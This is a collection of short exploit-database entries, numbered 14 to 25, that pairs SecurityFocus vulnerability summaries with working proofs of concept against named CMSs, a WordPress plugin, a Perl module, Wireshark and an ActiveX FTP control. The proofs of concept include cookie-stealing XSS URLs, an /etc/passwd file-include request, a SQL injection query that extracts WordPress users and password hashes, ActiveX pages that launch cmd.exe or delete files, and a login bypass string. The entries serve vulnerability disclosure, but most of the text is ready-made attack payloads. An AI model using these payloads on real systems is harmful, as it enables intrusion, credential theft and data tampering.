  14. source: https://www.securityfocus.com/bid/48118/info Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000
  15. source: https://www.securityfocus.com/bid/48132/info BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected. http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script> http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script> http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script> http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script> http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
  16. source: https://www.securityfocus.com/bid/48126/info Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. http://www.example.com/index.php?-action=../../../../../../etc/passwd%00
  17. source: https://www.securityfocus.com/bid/48166/info The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
  18. source: https://www.securityfocus.com/bid/48167/info The Perl Data::FormValidator module is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information. Data::FormValidator 4.66 is vulnerable; other versions may also be affected. #!/opt/perl/5.12/bin/perl use strict; use warnings; use Data::FormValidator; "some_unrelated_string" =~ m/^.*$/; my $profile = { untaint_all_constraints => 1, required => [qw(a)], constraint_methods => { a => qr/will_never_match/, }, }; my $results = Data::FormValidator->check({ a => 1 }, $profile); warn $results->valid('a');
  19. source: https://www.securityfocus.com/bid/48215/info The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected. <html> <title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title> <body bgcolor="#1C1C1C"> <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="url" value="1" /> <input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; /> <input type="hidden" name="button" value="Send%20Details" /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a> </body> </html>
  20. source: https://www.securityfocus.com/bid/48389/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. Wireshark 1.4.5 is vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap
  21. source: https://www.securityfocus.com/bid/48217/info Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/index.php?tip=art&id=2' <- blind sql
  22. source: https://www.securityfocus.com/bid/48391/info Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/path/catalogue.php?id_shop=7[SQLI] http://www.example.com/path/article.php?id_article=7[SQLI] http://www.example.com/path/banniere.php?id_article=7[SQLI] http://www.example.com/path/detail_news.php?id_article=7[SQLI] http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]
  23. source: https://www.securityfocus.com/bid/48392/info FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. FanUpdate 3.0 is vulnerable; other versions may also be affected. http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
  24. source: https://www.securityfocus.com/bid/48393/info Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities. Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers. Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 1. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Execute arg1 ,arg2 ,arg3 End Sub </script> </html> 2. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Run arg1 ,arg2 ,arg3 End Sub </script> </html> 3. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\Filename_to_create" target.CreateLocalFile arg1 End Sub </script> </html> 4. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="Directorypath\Directory" target.CreateLocalFolder arg1 End Sub </script> </html> 5. 
<html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\Filename_to_delete" target.DeleteLocalFile arg1 End Sub </script> </html> <HTML> Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br> <br> Description There is Insecure Method in (LocalFileCreate) fonction<br> Found By : coolkaveh<br> <title>Exploited By : coolkaveh </title> <BODY> <object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object> <SCRIPT> function Do_it() { File = "kaveh.txt" cyber.LocalFileCreate(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> </body> </HTML>
  25. ################################################################################################## #Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass #Author : Manish Kishan Tanwar #Home page Link : https://github.com/xlinkerz/ecommerceMajor #Date : 22/01/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi #email : manish.1046@gmail.com ################################################################################################## //////////////////////// /// Overview: //////////////////////// ecommercemajor is a PHP-based CMS for ecommerce portals /////////////////////////////// // Vulnerability Description: /////////////////////////////// SQL injection vulnerability:- ============================== In file product.php, data from the GET parameter 'productbycat' is not filtered before being passed into the SQL query, which gives rise to an SQL injection vulnerability --------------------- $getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc"; --------------------- POC http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI Authentication Bypass:- ============================== The file index.php under the directory __admin has an SQL injection vulnerability: the username and password supplied in POST parameters for checking a valid admin username and password are not filtered before being passed into the SQL query, which gives rise to an authentication bypass issue. 
vulnerable code is ------------------- if(isset($_POST[login])) { $check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'"; $checkresult=mysql_query($check); $checkcount=mysql_num_rows($checkresult); if($checkcount>0) { $checkrow=mysql_fetch_array($checkresult); $_SESSION[adminname]=$checkrow[adminname]; $_SESSION[adminloginstatus]="success"; echo "<script>window.location='home.php';</script>"; } -------------------- POC open admin panel http://127.0.0.1/ecommercemajor/__admin/ username: ' or '1337'='1337 password: ' or '1337'='1337 --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das ############################################################################################# --==[[Love to]]==-- #Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3